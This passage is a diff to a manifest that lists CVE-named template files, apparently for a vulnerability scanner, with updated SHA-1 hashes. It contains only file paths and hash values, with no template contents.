+http/cves/2020/CVE-2020-13927.yaml:4eee343e850092e1df4582b12e116be5604f05f3 http/cves/2020/CVE-2020-13937.yaml:7384b1f6df654558f2d75603bda7d6645e672099 http/cves/2020/CVE-2020-13942.yaml:0b3b785fa8404e80153dc4a82d8a016e432b4d4e -http/cves/2020/CVE-2020-13945.yaml:4e2a855203d2304b296e48c2b4831a400b12fce4 +http/cves/2020/CVE-2020-13945.yaml:7dd0edc2e450191110c7020fa63954b414f8fded http/cves/2020/CVE-2020-14092.yaml:75a0892c9809a6c1abd7e4cc3d799a44cb88399d -http/cves/2020/CVE-2020-14144.yaml:40caded9d510c89dd60c068f2d35258fa61eea2e -http/cves/2020/CVE-2020-14179.yaml:c96861afb0638a5ccff8a5f97ad52af592818064 -http/cves/2020/CVE-2020-14181.yaml:429c35b952adca9f03ce7adc7a5d5e519dd18fcc -http/cves/2020/CVE-2020-14408.yaml:cdc423a5df8c799fb72233d65d63b4f2147cb2f2 +http/cves/2020/CVE-2020-14144.yaml:b154655b7afe503c20aedbab45803aa31ecc9275 +http/cves/2020/CVE-2020-14179.yaml:4cc9e92f6036ec1a3a731394c2de0c2460a22687 +http/cves/2020/CVE-2020-14181.yaml:01ed3060f0f4e1ef754f4764f3f4dcc5eb86f18f +http/cves/2020/CVE-2020-14408.yaml:03e86ce6fda6d1003b5e4751cb15059c71f84cc7 http/cves/2020/CVE-2020-14413.yaml:bd2640f4d67b741a9ca405cacbafdb65d02d6a61 -http/cves/2020/CVE-2020-14750.yaml:74bbe1301a9d4ce274fb4c8c3ffd793ed5c57ac4 +http/cves/2020/CVE-2020-14750.yaml:a24a371548bff21ce82bca1dc6c231af5a92b863 http/cves/2020/CVE-2020-14864.yaml:02384242a01304c27bfc479d385b6a8b345e51e5 -http/cves/2020/CVE-2020-14882.yaml:fd57473728b6ac18da7e1cc57f68d1d0a4ab2414 -http/cves/2020/CVE-2020-14883.yaml:2ea22351fa23ffe398bdf5233c92e21ce1890f2f -http/cves/2020/CVE-2020-15050.yaml:04471bb70d0132626229e681c0f49c1d3a33fdd4 -http/cves/2020/CVE-2020-15129.yaml:5fb2f2fdeedf32e502818d6d1942e061099ca0b6 +http/cves/2020/CVE-2020-14882.yaml:365d4e2647f436ed763322e8af9b0cfc09f71502 +http/cves/2020/CVE-2020-14883.yaml:a944cb030b2b6241ca7f436994dfa627537cbe4e +http/cves/2020/CVE-2020-15050.yaml:447a2663f0d3dd0c219e1e27a3488f900c2da90f +http/cves/2020/CVE-2020-15129.yaml:2b114eb97155628621b80f5231f4d40da2ca451f http/cves/2020/CVE-2020-15148.yaml:1818ce67c964234a5007c23b04a0bf8972c127b2 -http/cves/2020/CVE-2020-15227.yaml:1f64993dd98b122b7288808fbf39cd7cc6362dc5 +http/cves/2020/CVE-2020-15227.yaml:6941ca8d143cd64c75b9e7b148a92a5955f85c65 http/cves/2020/CVE-2020-15500.yaml:75f7b62a818f3845bb533cfbb29cf78bdff68d95 http/cves/2020/CVE-2020-15505.yaml:e6a491c737cc161a2f84ccf4adebee81a745337b http/cves/2020/CVE-2020-15568.yaml:0884dd4a2c77ae056269ca663d8253757fd049bb -http/cves/2020/CVE-2020-15867.yaml:04b7c79525241dcc482ef77b35f66e63ddbb9efd -http/cves/2020/CVE-2020-15895.yaml:fda89e314831219a21bce628e22bfb1a0fe5bb58 +http/cves/2020/CVE-2020-15867.yaml:b909368655a4ad540e14933e0adf9a07f8c15e6b +http/cves/2020/CVE-2020-15895.yaml:83a749ed0947b3a70fcfd3be1ba652d7ed56eb71 http/cves/2020/CVE-2020-15920.yaml:b9bce590c1d6a4a2950e930ec84e5bd343fd1cf1 http/cves/2020/CVE-2020-16139.yaml:d6f5ca556451807e2d514d69af0ec61298cf723d http/cves/2020/CVE-2020-16846.yaml:56d1ad720f2676a700fe9fcbdd8621a5f3538796 @@ -1782,43 +1782,43 @@ http/cves/2020/CVE-2020-17362.yaml:73c86a5a4a59e4f50fa8943fc437acfef4d14c78 http/cves/2020/CVE-2020-17453.yaml:09430bfffaa517528900fefef8ab4890595a7c6c http/cves/2020/CVE-2020-17456.yaml:36bc3b3b798495d74160cedf8747faf400c93ad1 http/cves/2020/CVE-2020-17463.yaml:9f44d84da08522dba61582a66775eafae5f8c65e -http/cves/2020/CVE-2020-17496.yaml:561344ac87ec46e1e6dce6f78065c6da7fc3b848 +http/cves/2020/CVE-2020-17496.yaml:98940e0dde005cc27c7dc38614474f918e146b43 http/cves/2020/CVE-2020-17505.yaml:98f54ae7112117d8e7d0c1513d751e16279e93a5 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a http/cves/2020/CVE-2020-17518.yaml:d81d48cbbd5df9824834f232c4c3ee0ecbe19d6f http/cves/2020/CVE-2020-17519.yaml:8b707e9dceb3975811ea8078b618c9e5d26819e7 -http/cves/2020/CVE-2020-17526.yaml:e12cb3eb5c2d400e46318eda43860b8a3f7f938e -http/cves/2020/CVE-2020-17530.yaml:93faa23ee61dcd6a38d69a5dec4a449d117d6a97 +http/cves/2020/CVE-2020-17526.yaml:761826fb96f602aa65fe88b67eb6ff97b0e33e88 +http/cves/2020/CVE-2020-17530.yaml:a78be1b5e47f3db13d0e7d456e190447bd7056ea http/cves/2020/CVE-2020-18268.yaml:6fd016f916dccfaa0d8a8ba365b143966bab3b49 -http/cves/2020/CVE-2020-19282.yaml:46af0c971b5fee4d62b3f666c6a1252c3add5c50 +http/cves/2020/CVE-2020-19282.yaml:05b5fddea80d19c010fba33567a792a113567ea0 http/cves/2020/CVE-2020-19283.yaml:23c95bd3067b4da3a55e3410e3658758b7aa4fd9 -http/cves/2020/CVE-2020-19295.yaml:5f6cb196c425b308cc93c0b4532a3b531e42883a +http/cves/2020/CVE-2020-19295.yaml:9bc25f839424613a884e1310d0d61480c9e69589 http/cves/2020/CVE-2020-19360.yaml:9886ca3068574343a897d86700121d2f07afc83d -http/cves/2020/CVE-2020-1943.yaml:45ee2e1f0fecb046981a8b7dc97c96bc48cbaaad +http/cves/2020/CVE-2020-1943.yaml:0cdf138522071e83f15a5416be5c330ce63411eb http/cves/2020/CVE-2020-19515.yaml:b59aebca0899304e6542d3c0bf42356d86a38d46 http/cves/2020/CVE-2020-1956.yaml:e39efd627a666be39c486b9aeeaa316d2795d820 http/cves/2020/CVE-2020-19625.yaml:c838f4924ba3563572ed00d81634424490d317b4 http/cves/2020/CVE-2020-20285.yaml:e6ca53b6da7cd8dd11006df026e5fc078a0aa084 -http/cves/2020/CVE-2020-20300.yaml:8436961998dba358c46ebe65b0858f77870f1f62 -http/cves/2020/CVE-2020-2036.yaml:99b334e4c49c7966e1bfb717f636251a20f0fac0 -http/cves/2020/CVE-2020-2096.yaml:c7f9febba3f35b0a85bb0528999a2772c9c9f334 +http/cves/2020/CVE-2020-20300.yaml:d681ae7d07f3c003c61e43a3420f445078fb4fe7 +http/cves/2020/CVE-2020-2036.yaml:9b95369973ccef0d271975b003a660282d40b248 +http/cves/2020/CVE-2020-2096.yaml:74f98a3ef057ddeb2f265bb0b77e36877670add4 http/cves/2020/CVE-2020-20982.yaml:538d3beb3a9976144b2a6a10e8fa30af220dd0d4 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 http/cves/2020/CVE-2020-21012.yaml:03a5be731cfd6bf8b8e6d82c5ee1aded97e6e695 -http/cves/2020/CVE-2020-2103.yaml:aac48cef0b9227ae1772c6a46a4994d0f8f42518 -http/cves/2020/CVE-2020-21224.yaml:e12fa6cfa215ced531fed8d2a61e88f38f51503b +http/cves/2020/CVE-2020-2103.yaml:aba6245af90cad4d38da3566653a918f273b8b58 +http/cves/2020/CVE-2020-21224.yaml:4f2ca3879d3b04e607f6ecea52ab9922400edf19 http/cves/2020/CVE-2020-2140.yaml:278c2662d3e3830d9336cb5c74086e11b5e9c97e -http/cves/2020/CVE-2020-22208.yaml:4b1fbb91ff66485a0c78db828d739baf83b50860 -http/cves/2020/CVE-2020-22209.yaml:641ede936256f31c294c4cf42e9741e06ec154c3 -http/cves/2020/CVE-2020-22210.yaml:40b4a4080a2c3d0088a9e75e0926302ccadc5d6e -http/cves/2020/CVE-2020-22211.yaml:13b7e1e245ab3a6b3b0a5cf5e472c8517e6beb2b -http/cves/2020/CVE-2020-22840.yaml:fd20c29f3c2e3f1b304385b8d2a39acd74d0b8cf +http/cves/2020/CVE-2020-22208.yaml:8fe00cd3b00fbd74441916324e90b21d478d02ba +http/cves/2020/CVE-2020-22209.yaml:2ed2b2a1bd6add84b3cf1124241234439cc207fd +http/cves/2020/CVE-2020-22210.yaml:e23c86e399b80c9128a91d239227cad78b74c3e2 +http/cves/2020/CVE-2020-22211.yaml:b8c823b66f885e03aa42ab47c0c39e32e6766f10 +http/cves/2020/CVE-2020-22840.yaml:7d77c7a6337a820a7e9a02c5b7681038fdcba49c http/cves/2020/CVE-2020-23015.yaml:ef79be791a7a626c839061dcf881161a0234c38e -http/cves/2020/CVE-2020-23517.yaml:9d46cea677bc6757b61dfecfc4521ab2bff2ce43 +http/cves/2020/CVE-2020-23517.yaml:49af293484a1d10da5b62a5e289b4eb561185de0 http/cves/2020/CVE-2020-23575.yaml:67ab082068717a9921ae80d3394859c74d1398ac http/cves/2020/CVE-2020-23697.yaml:ad5a719d4e93a26db478bd8c3f4245db3515b06e http/cves/2020/CVE-2020-23972.yaml:c1383a5e782d88347b1ace6499e3c8e148aad5c4 -http/cves/2020/CVE-2020-24148.yaml:2166a7a89e8a518ea044c158a832614622e7326b +http/cves/2020/CVE-2020-24148.yaml:989c32432b931340b534e2c30d501aca91916fd3 http/cves/2020/CVE-2020-24186.yaml:25250262fde4e0a9d147c93c2f88bd9cbb775129 http/cves/2020/CVE-2020-24223.yaml:3dcce16e9d8be524d4f16ebc04564135e16a5df3 http/cves/2020/CVE-2020-24312.yaml:c504548af3d920be3be02e59c790bd7690154549 @@ -1827,137 +1827,137 @@ http/cves/2020/CVE-2020-24550.yaml:df5052c65b1037f38f8ed25cb384ec4c54f81b8c http/cves/2020/CVE-2020-24571.yaml:5c31b80a9c7ae3e327ea91a5112b930676527155 http/cves/2020/CVE-2020-24579.yaml:62759de772a6d5027e0dcdd5964ce4cc03194022 http/cves/2020/CVE-2020-24589.yaml:9fdcb854777f1f0f4db18d334f9c769384a71d5c -http/cves/2020/CVE-2020-24701.yaml:72f62ed57289c0eaee6203cfb0c75f10ee585fa0 -http/cves/2020/CVE-2020-24902.yaml:a7003733e9e19cf4e889f2d621b2761fa220b4d6 -http/cves/2020/CVE-2020-24903.yaml:9f1a921d6e793897af3a095d174799345de16ae1 +http/cves/2020/CVE-2020-24701.yaml:e508397d9084418101f8c7ec5ab89af16ee71488 +http/cves/2020/CVE-2020-24902.yaml:9753a16b36bb924c034a2fb4e18e5ee99af90017 +http/cves/2020/CVE-2020-24903.yaml:1635be5492784ad893257757ca9e7c789f4e3236 http/cves/2020/CVE-2020-24912.yaml:9a5855c216f6eb711710ff74138e2d615ebe5cfd http/cves/2020/CVE-2020-24949.yaml:75e53db8ae949b1e8991bcf5b51fc2afd196c6bc http/cves/2020/CVE-2020-25078.yaml:d2e80d7483241efcdeaeec253eee58e18089501b http/cves/2020/CVE-2020-25213.yaml:2b4d15844a75b3c8b331efd61791d2a8cb3cf8e0 http/cves/2020/CVE-2020-25223.yaml:a3693fe0f645932d320d2ab0ff173c31744f0850 -http/cves/2020/CVE-2020-25495.yaml:606d5253dc6408f705c9d4f97d1f0333ccaaa9b7 +http/cves/2020/CVE-2020-25495.yaml:44922a1f5d6529609872f202c87a1838f4546c99 http/cves/2020/CVE-2020-25506.yaml:883657db91c0d3f56d9828180b950d477af18999 -http/cves/2020/CVE-2020-2551.yaml:daf3a1a918c62522dae154b7d8df419632f60cec +http/cves/2020/CVE-2020-2551.yaml:28d3efdcf4f02c62b46518aae987c30848445688 http/cves/2020/CVE-2020-25540.yaml:b982bfa81fcb18ff4ae12e6075875a032eac51a9 -http/cves/2020/CVE-2020-25780.yaml:0b7ae61ccba1216ced95d406f7a4774c41fdb122 -http/cves/2020/CVE-2020-25864.yaml:ef1d0bdf192619ff4fd55b101d21ee562fd6c59d +http/cves/2020/CVE-2020-25780.yaml:9646a532ef373b886dd56f391c5b30cd49e181b4 +http/cves/2020/CVE-2020-25864.yaml:fca0c3e89473eaa270d8156dc14376e46f25c210 http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f -http/cves/2020/CVE-2020-26153.yaml:21dc7d23c36be26e2831ae2e1d0ca233c07f99c6 +http/cves/2020/CVE-2020-26153.yaml:2fc5562b10f643840971b2a2aabeee2113cf2f3b http/cves/2020/CVE-2020-26214.yaml:c9550b0a95085975804bf0adf411947d89925d2e http/cves/2020/CVE-2020-26217.yaml:22e1a3fe2541425175198c852f37d342fbb87a0a http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 -http/cves/2020/CVE-2020-26258.yaml:65445abdce991db29cdff3a214f1b7d6de02911a -http/cves/2020/CVE-2020-26413.yaml:3a442a78ad2055750c946162d84ad691eeb84d6d +http/cves/2020/CVE-2020-26258.yaml:7bde4ad5624f9c809c29343b361cf37151ae1c64 +http/cves/2020/CVE-2020-26413.yaml:e9a55fce9e81f8b005fb221ff3ca9c55b1723f02 http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a http/cves/2020/CVE-2020-26919.yaml:1f958ae88864447bcb937900bf0a813a033204b5 http/cves/2020/CVE-2020-26948.yaml:513d547c9b9f5ef43299cb380687dd64caaced81 http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 -http/cves/2020/CVE-2020-2733.yaml:0db30c857faaa8bbcd5c33a59199f572fe7fd8de +http/cves/2020/CVE-2020-2733.yaml:b52e91519a815bf092d7e7f7218c8a864b14fc5a http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 -http/cves/2020/CVE-2020-27467.yaml:8efad74b23003596aee3967337a4e7fcec8808ee +http/cves/2020/CVE-2020-27467.yaml:76b7fca1d3b0ad29b931134a22af2e4d4397cdb0 http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:83a5092db5dd741811145536f0cf338c655aea78 +http/cves/2020/CVE-2020-27838.yaml:ff9a77d2c9dac8bf8f11c587ece6345cf9e10a2a http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 -http/cves/2020/CVE-2020-27982.yaml:ce058edc20e39bf356c706aaed2545ef6d168cb4 +http/cves/2020/CVE-2020-27982.yaml:7b9d9d3713e2acf86c532a6b9db417367ef24d89 http/cves/2020/CVE-2020-27986.yaml:893336c14059a046c22f8cd517e66893d0139361 -http/cves/2020/CVE-2020-28185.yaml:0ee814dd16cc4fac25a5648ce8899fc50f774896 +http/cves/2020/CVE-2020-28185.yaml:aaf3cfc4401e39b59dadeb576d646a1b33c288be http/cves/2020/CVE-2020-28188.yaml:c0980bcbb94378ff28df21229115235308770f13 http/cves/2020/CVE-2020-28208.yaml:fcf8162a856d78d120573693438b0646df11a72c -http/cves/2020/CVE-2020-28351.yaml:a98f322b54a1e5942f159de3dc8bba070461aebc -http/cves/2020/CVE-2020-28871.yaml:48d31e212277d0f900ab343d86a2d0c49846fa79 -http/cves/2020/CVE-2020-28976.yaml:4e0c3b33a77a97106b4ef3e5e6b03e07f8a07499 +http/cves/2020/CVE-2020-28351.yaml:dbb037f959dbf5ae8dc9f7f75a9387fe7de03c04 +http/cves/2020/CVE-2020-28871.yaml:5ce59d1a1acbd8433831b49c8e9f3472ec051f06 +http/cves/2020/CVE-2020-28976.yaml:828415a9bbd36733fd459751712c303ced1d00fa http/cves/2020/CVE-2020-29164.yaml:b22ac231890e04ebe3bd4842f48b8b75dfa68807 http/cves/2020/CVE-2020-29227.yaml:014575ac4dec53a13f8dd825cff7a84066f0ae9c http/cves/2020/CVE-2020-29284.yaml:80a4ee991c7571f79905e18861b3dd84a62689b5 -http/cves/2020/CVE-2020-29395.yaml:7b4235a8a22ace79151a4e91d0c8a74e8c164de2 -http/cves/2020/CVE-2020-29453.yaml:a90ee47f4c92ec5f8af322024b22dfcdce58be47 -http/cves/2020/CVE-2020-29583.yaml:b66358499d1e694d26ea0a79763682ba96e42ec9 +http/cves/2020/CVE-2020-29395.yaml:87498f96d897987aa7ab5c436a6525f3b6222810 +http/cves/2020/CVE-2020-29453.yaml:39043ce7aaaedd3873e1ca47d0ee94be7a55b005 +http/cves/2020/CVE-2020-29583.yaml:89ff719d88a5612f8c90d69298e24b88f1a48cfd http/cves/2020/CVE-2020-29597.yaml:0784e4768d628b088948e4409de7690b6b28dc4c http/cves/2020/CVE-2020-3187.yaml:633d566201388dc1399f783b58cfc07f94d4aa51 http/cves/2020/CVE-2020-3452.yaml:4171936b0f65db2e31afd0b4a9157a048ec3eb91 http/cves/2020/CVE-2020-35234.yaml:59dfdc805ed104edcb3cd667ec5f602c0e594cb9 http/cves/2020/CVE-2020-35338.yaml:b9e1195c81bf31210947ca6f71147321930b90c1 -http/cves/2020/CVE-2020-35476.yaml:771d47371846727ad50691d19e77068c987d2ddf +http/cves/2020/CVE-2020-35476.yaml:251ad68b65faf3e5c22542c5bf8912b6c2703a7f http/cves/2020/CVE-2020-35489.yaml:950d6dbeed43968347cb9c634c5d4c3b3e0e2853 http/cves/2020/CVE-2020-35580.yaml:5ce1a1e4040aaa35ba363d08f013c0fe525534bb http/cves/2020/CVE-2020-35598.yaml:5e721e6213989f337663289eff70cf95418401a2 http/cves/2020/CVE-2020-35713.yaml:2da565a85a1f7e90b28df0608bf2b6c8832c23dd -http/cves/2020/CVE-2020-35729.yaml:d5a2e6c5cab0042af2c388c6602ebf74d3132c4a +http/cves/2020/CVE-2020-35729.yaml:4873a7b3f1857ba4e39da7bc094f32fffdd76462 http/cves/2020/CVE-2020-35736.yaml:496c42f5b621668efe592864a945cb3f45d73b8d -http/cves/2020/CVE-2020-35749.yaml:071b5286eb814f3a58050ca297b0c84046044df1 +http/cves/2020/CVE-2020-35749.yaml:8bbcde21ae379f1d88185ba966a2cd7e36c5baf8 http/cves/2020/CVE-2020-35774.yaml:04828fe9dc9b3cc64c404c9f22d4f2c4746cb04f http/cves/2020/CVE-2020-3580.yaml:d1950f88016803a9adf2de04b9f8d0d931fa1f12 -http/cves/2020/CVE-2020-35846.yaml:a25c0fdcc92cfb3cf40904011f27ac7f99b1ad0d -http/cves/2020/CVE-2020-35847.yaml:07da3afa6cf5e3655caf39f9879f0387e40eec23 -http/cves/2020/CVE-2020-35848.yaml:f04f86c99c5997649d6f71415c4a05a7c689a62b +http/cves/2020/CVE-2020-35846.yaml:e37d2942919403918306c4a9c5ba9f15173a2e16 +http/cves/2020/CVE-2020-35847.yaml:c62ca7b5601a7b2ebd8882a5dc531faf020f0d8f +http/cves/2020/CVE-2020-35848.yaml:915f8092d7964f41efd0a4133e72f3428ffdd227 http/cves/2020/CVE-2020-35951.yaml:8a82a09c399a210010151ef2b26290cb8b3c32dd http/cves/2020/CVE-2020-35984.yaml:73026939fceebcf822ec1708bc95bf679a9222c5 -http/cves/2020/CVE-2020-35985.yaml:25d58bc63d2f6e70cdf0612c31bcd71a290f9364 -http/cves/2020/CVE-2020-35986.yaml:e42976bcb7af8a044fe11e1ea3e886126744e7a6 +http/cves/2020/CVE-2020-35985.yaml:6fd4d8007122cad1ec7bf6bd6c6cdb625a7bcef8 +http/cves/2020/CVE-2020-35986.yaml:ba69ae1d4086fc35ad986e242469b71e9e83cb12 http/cves/2020/CVE-2020-35987.yaml:40f2fbbdfbf459fd19272719b14853a9a059b2df http/cves/2020/CVE-2020-36112.yaml:e52719830bf2eca68effb4397eadb8b8281338f3 -http/cves/2020/CVE-2020-36289.yaml:09d3dc542482b576dcce44723ed042a87ce8e56b -http/cves/2020/CVE-2020-36365.yaml:5452168f24eef6bb11c0bf99e19b0941d22f6609 -http/cves/2020/CVE-2020-36510.yaml:a729adbc01e17fbf5771282c7db544252fdca1d3 +http/cves/2020/CVE-2020-36289.yaml:5801046a5d67ec4e49a7fdb971cd808028e6f51f +http/cves/2020/CVE-2020-36365.yaml:510d539301a794ef468e58e15cf75f38e390db9c +http/cves/2020/CVE-2020-36510.yaml:513627a878fe4a2dc758918ac425eb9d3ed877f0 http/cves/2020/CVE-2020-4463.yaml:644d422d8b7c29684081b2ba722c6c8c49dc82a2 http/cves/2020/CVE-2020-5191.yaml:9a3a930e48da4976766fbacc6722bb8b6c262c7a http/cves/2020/CVE-2020-5192.yaml:11f227839a3375c5d6e419bea5f60366f243ad94 -http/cves/2020/CVE-2020-5284.yaml:d649fe6e72511053e881be3d6f1598203d8e1f4b +http/cves/2020/CVE-2020-5284.yaml:73573308178fb3f5534343552cfa09b3eadb0a6f http/cves/2020/CVE-2020-5307.yaml:5f2c1c7f8182d01ef6c0cab9b090f901f4e91865 http/cves/2020/CVE-2020-5405.yaml:362a063401b8e384df88fcc1f958163e9d355922 http/cves/2020/CVE-2020-5410.yaml:15ef6b720233bda3b0a3bd22593417fa44f7cbc7 http/cves/2020/CVE-2020-5412.yaml:52fe5ee1514d295e0ed4f0e29db378764c447047 http/cves/2020/CVE-2020-5775.yaml:cbcbf5ab4ce79076fa4f024290982f26ab44323c -http/cves/2020/CVE-2020-5776.yaml:37b1a85f99e4ce899518479a724c57263d4d1991 -http/cves/2020/CVE-2020-5777.yaml:b63aa31cc0d95030273f03b18a1fe55bb90b4ba4 +http/cves/2020/CVE-2020-5776.yaml:4c980d0255ff032d2220343fd47b337434fce750 +http/cves/2020/CVE-2020-5777.yaml:f8267f5c441814162482fa65b4a72658ce43a51c http/cves/2020/CVE-2020-5847.yaml:8a1c0ba47de6c6cd63ede6605bd99f7f7d2bc88a -http/cves/2020/CVE-2020-5902.yaml:f9ccb5664ef63a869f8b66d0cf4afb3ed276eb03 +http/cves/2020/CVE-2020-5902.yaml:41db39b915b93425974607bb8e5f363666892677 http/cves/2020/CVE-2020-6171.yaml:7485379a4227df9a0668ace45ac89daeb1a1445c http/cves/2020/CVE-2020-6207.yaml:dc2081d146a83be2fdd12363e69d48540509dc98 http/cves/2020/CVE-2020-6287.yaml:5152426f4629703328b66fa272f3ca9137e59d5f http/cves/2020/CVE-2020-6308.yaml:662c78d7be59c6090f8ab983b9aecbe01757cae6 -http/cves/2020/CVE-2020-6637.yaml:fba14d8647f45e33f8d36f5d1c1db8377c7400b2 -http/cves/2020/CVE-2020-6950.yaml:3fa4888fc069a5caeb65c70a99cdc10810e770c8 -http/cves/2020/CVE-2020-7107.yaml:a700703a34796a442c3de197203d6be12a7e0864 +http/cves/2020/CVE-2020-6637.yaml:f8ed28f40d91f760418805acdc9da468c5495781 +http/cves/2020/CVE-2020-6950.yaml:0a7a8510e5c6dec79cdcaf5c3d624fbb25264918 +http/cves/2020/CVE-2020-7107.yaml:9cf9a8dd7b63fa3b5da4a12182bd99b40b2a9a75 http/cves/2020/CVE-2020-7136.yaml:6e732e958094e4ad30bb994e7602c0cb2e04a1ca -http/cves/2020/CVE-2020-7209.yaml:ca6a479e80d5a57d81d6eab02ddd40d6adcbec3b +http/cves/2020/CVE-2020-7209.yaml:fcfd41a9602587f92f8c82ba863d15af19196a8f http/cves/2020/CVE-2020-7318.yaml:4103c3864c23d3d6051a46a353c0a26f999c315d -http/cves/2020/CVE-2020-7796.yaml:6cc8f8678bc010ebf48440d81d0abdf71663f8be +http/cves/2020/CVE-2020-7796.yaml:6157549eb38e8fc6de1a599af340892651ab2a72 http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2 -http/cves/2020/CVE-2020-7961.yaml:ab72f1bedfb82671b752867be3b31726e38645cc -http/cves/2020/CVE-2020-7980.yaml:2eb1cc78c20af5e24b2b86a0fc7af6b14b44c1a2 -http/cves/2020/CVE-2020-8115.yaml:a13dea3cecb85783d0a5b62323bd41d7831ee00c +http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a +http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d +http/cves/2020/CVE-2020-8115.yaml:68173d36e231cef7317d8a24655cde2134bf2052 http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5 http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915 http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6 -http/cves/2020/CVE-2020-8194.yaml:3abf9614723c76c7a160da2510737b930f065f33 +http/cves/2020/CVE-2020-8194.yaml:71f885efd84c57355ef4fa485e9d15d11ea6cc81 http/cves/2020/CVE-2020-8209.yaml:d5a138aa97863d4074fe218b3049f7791fb81ab9 http/cves/2020/CVE-2020-8497.yaml:f1ae2ea882ecfe74d992711a94a9ab226dc34f2f -http/cves/2020/CVE-2020-8512.yaml:d79f34d3f17b10ba6b21098aeb116269e5f5c053 +http/cves/2020/CVE-2020-8512.yaml:f03e25cb7af1cd92e5df5a1a33c10ea4168fd063 http/cves/2020/CVE-2020-8515.yaml:9047b8393f7d8cc847713268690b7155b6508643 -http/cves/2020/CVE-2020-8615.yaml:469dcf929c3a9b70bca8019a36d19c230be6b9ef +http/cves/2020/CVE-2020-8615.yaml:466c8ab093c88c2202010c8f47bb1628dcd03345 http/cves/2020/CVE-2020-8641.yaml:b734674ab43e3bbdc7c4396851f425c9721f8362 http/cves/2020/CVE-2020-8644.yaml:442e833ef76b787a02a056b9de094015e0c57618 -http/cves/2020/CVE-2020-8654.yaml:3749d3da6a2d2c75c50963fabdc71255179a1c2d -http/cves/2020/CVE-2020-8771.yaml:4754ef3c81ddc273334934a7251d7346b3317fc0 +http/cves/2020/CVE-2020-8654.yaml:c8d9d86f2e3ef5d962f91ac9d9375c52c829daf9 +http/cves/2020/CVE-2020-8771.yaml:0276bedcddd75efd3e47fc782c5ab8e0c20d8939 http/cves/2020/CVE-2020-8772.yaml:1c497ecdec6a48ebef0e1aef3571270c98b119d4 -http/cves/2020/CVE-2020-8813.yaml:98c74694d8c400e0aab91434f845dc5fa633b687 +http/cves/2020/CVE-2020-8813.yaml:756b775b321ff474a587422e937e774810beb8f9 http/cves/2020/CVE-2020-8982.yaml:2609994079bdeb1e72ba61248516e1d95f6258a6 http/cves/2020/CVE-2020-9036.yaml:c406a983523f91b2ef6adbec171216597d3e81bb http/cves/2020/CVE-2020-9043.yaml:849faa887c73b1638d4f68a403a21a320989a062 http/cves/2020/CVE-2020-9047.yaml:ef83a27c2edd3c2776b89c8bfdaec91d6e1ace59 -http/cves/2020/CVE-2020-9054.yaml:9ad47329bd8c5963d9a3d1514732debefde17184 +http/cves/2020/CVE-2020-9054.yaml:3ba9a6c742b9f564844e488e31a0d44563bfa60f http/cves/2020/CVE-2020-9315.yaml:9c617983c07752889978bb310592e80738e185ec -http/cves/2020/CVE-2020-9344.yaml:2f25369c475255f13f89a8775e12006d3b6f6ba8 +http/cves/2020/CVE-2020-9344.yaml:55892b355bbb43695c3b09f63948f96d9cac0630 http/cves/2020/CVE-2020-9376.yaml:4ecda617567ce3ec2f2afd357739dd21f516b259 http/cves/2020/CVE-2020-9402.yaml:f03bf05b0f3b933accef4dcd7168f9129eadcfe2 http/cves/2020/CVE-2020-9425.yaml:a917fe2704478f54404b4a5a410ea249350516d1 http/cves/2020/CVE-2020-9483.yaml:b856b57a3c83f86b77fe655826d69410a2cff66c -http/cves/2020/CVE-2020-9484.yaml:c795427074e9809a36ca8caa415e483a41ee6fc6 -http/cves/2020/CVE-2020-9496.yaml:e9a21a940edeba1e4776276f4c6e6f9527233b3f -http/cves/2020/CVE-2020-9757.yaml:9117b7af3d8ea83989841517c263d3304f746ea8 -http/cves/2021/CVE-2021-1472.yaml:9c0b6388d3d88f292da9910bc7c79f93fa3737c8 +http/cves/2020/CVE-2020-9484.yaml:2a0e587f8dc7ee7d43fc5b4beb355e46ef7b29a6 +http/cves/2020/CVE-2020-9496.yaml:3d3a5a73b8b572caa6bf8bd540a0ee1120f09fac +http/cves/2020/CVE-2020-9757.yaml:0053fbf16e0a8372665b9d88c7653e1e83aaddd8 +http/cves/2021/CVE-2021-1472.yaml:e7cbd18175efcfb863bc4ccc03e572a70cc0309a http/cves/2021/CVE-2021-1497.yaml:8e4e8691b05b2e3003f544dba1dd82e9d0469977 http/cves/2021/CVE-2021-1498.yaml:34f12d383bcd66e9c0b8abdb32af5eee246f0672 http/cves/2021/CVE-2021-1499.yaml:0d707d87542b57952d40f7c04fb7e9f3d049eddd @@ -1965,111 +1965,111 @@ http/cves/2021/CVE-2021-20031.yaml:8f171b51f07e049e29e708aba398ac1a5e9e0103 http/cves/2021/CVE-2021-20038.yaml:7167a6c38c9fde66a10e0146a4d0d470fa64c37f http/cves/2021/CVE-2021-20090.yaml:492bf1d4e71155f00ea4caff43a2ed3bd18991cf http/cves/2021/CVE-2021-20091.yaml:19f8133469d473c2292a69989c39c54a0cf87ed7 -http/cves/2021/CVE-2021-20092.yaml:75518839ac66c0b8876df0a90fa658ee9645d7af +http/cves/2021/CVE-2021-20092.yaml:0f61cbc176b63fc47069b6179b1395e36c0c895d http/cves/2021/CVE-2021-20114.yaml:36093947ca866a4627465d891f407337217f0806 